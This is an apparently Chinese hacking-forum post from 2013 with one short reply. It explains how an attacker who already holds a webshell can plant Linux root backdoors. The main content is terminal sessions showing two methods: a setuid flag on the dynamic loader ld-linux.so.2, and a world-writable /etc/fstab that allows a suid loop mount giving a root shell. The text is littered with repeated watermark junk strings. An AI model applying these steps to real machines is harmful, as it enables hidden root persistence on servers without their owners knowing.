找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2993|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究1 i, m3 R2 F, z# l6 c5 Y  m* Z
/ s) I! W1 n) R
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究* n0 {$ R$ V. B& T" ~
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
1 g' H1 ^7 @+ F9 Y1 `/ q5 E/ A# elrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究& e4 Z; X$ G+ \3 p5 p1 z
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
$ P& T) Y: I5 g  |6 N[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究( [1 C7 {7 c' |( d' n- u
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
: j8 i7 H6 E9 J  j* q9 q  slrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究# v1 ?3 W+ s  W% ~. C0 N
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
3 P) ]0 k$ S9 Z$ _/ D2 o我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究0 Z$ V  ?3 O" n5 X9 |6 k7 j5 t
  h, i" v- r2 G  m
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
/ M" G- U/ `. N1 O5 @3 ^& q: F( H: Y3 W9 }9 v- d6 c
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究0 _+ D+ O2 L: c8 ?$ h1 R
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
" t& p% ]2 }: W9 S; {: G& Q; y[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究, }6 O1 Q4 v- o! ?% f* {. W
root2ezX-BUG-关注前沿信息安全技术研究$ \9 B  e9 W, y
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究8 H& a0 \$ M. H, w5 B9 X
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究# }, {4 N7 _' Q7 a7 W8 u0 p
: j) m' a6 W2 x/ P% H- [6 n" f  m) H
方法二:2ezX-BUG-关注前沿信息安全技术研究% [* N0 F6 P4 h( i2 @* V# ~' p+ r0 I

: L$ b9 U  p# o) s& Y) M- ^看过程:2ezX-BUG-关注前沿信息安全技术研究
9 ]) C# @2 C- N! z
( ?0 F0 B8 C1 P/ i0 Z[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
4 @. F! y" E/ q5 `6 W, w[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
/ W" O4 C; m, Q# O* N" ?3 D* ^, `" {* M$ K
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
3 s; A( y7 E. L; u% ?! p
$ o$ A2 F0 L; D$ z1 M) Z[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究( [& u+ B! A: G5 P+ e
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
6 j2 w8 z. [! o[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
( L& o& L: i2 b, f9 h: M( o% X( p  `8 J9 J. Y6 |0 U4 y
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究! L4 u  e7 }2 l7 ~* `6 }- F: ?
  g* F8 p2 B; [0 K1 l5 G9 M3 {
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究& V0 B9 b. k; [3 g! w
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
8 L" n7 u- a1 V* g+ ^* t[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
4 P" B0 }" A% Z$ P. t7 q! `9 Q[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究
. e  s" Q8 [+ B[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
! `+ \$ o8 ]. b  utotal 182ezX-BUG-关注前沿信息安全技术研究+ G/ k; Z# u: g/ d( w/ h7 u" @
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究& w1 W4 J, {9 W% ^
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究5 K$ x% b% E" i& s% f' v
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
/ M6 C/ L# T* s# S, z" C. Gsh-3.2#2ezX-BUG-关注前沿信息安全技术研究
5 b! Y! A4 ]/ l, _* N看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究4 [3 u( z+ z& D0 v7 Q/ }
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究4 X' S6 f) U9 C+ H5 H4 f8 i4 I

0 o7 A8 g1 n6 I, C; K  N* z3 l貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究. k4 s7 Q$ Q9 c+ O
2ezX-BUG-关注前沿信息安全技术研究/ T1 d* w& a" J8 U# G
& f# Q" e" [% [/ H  U  C2 Y" J
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表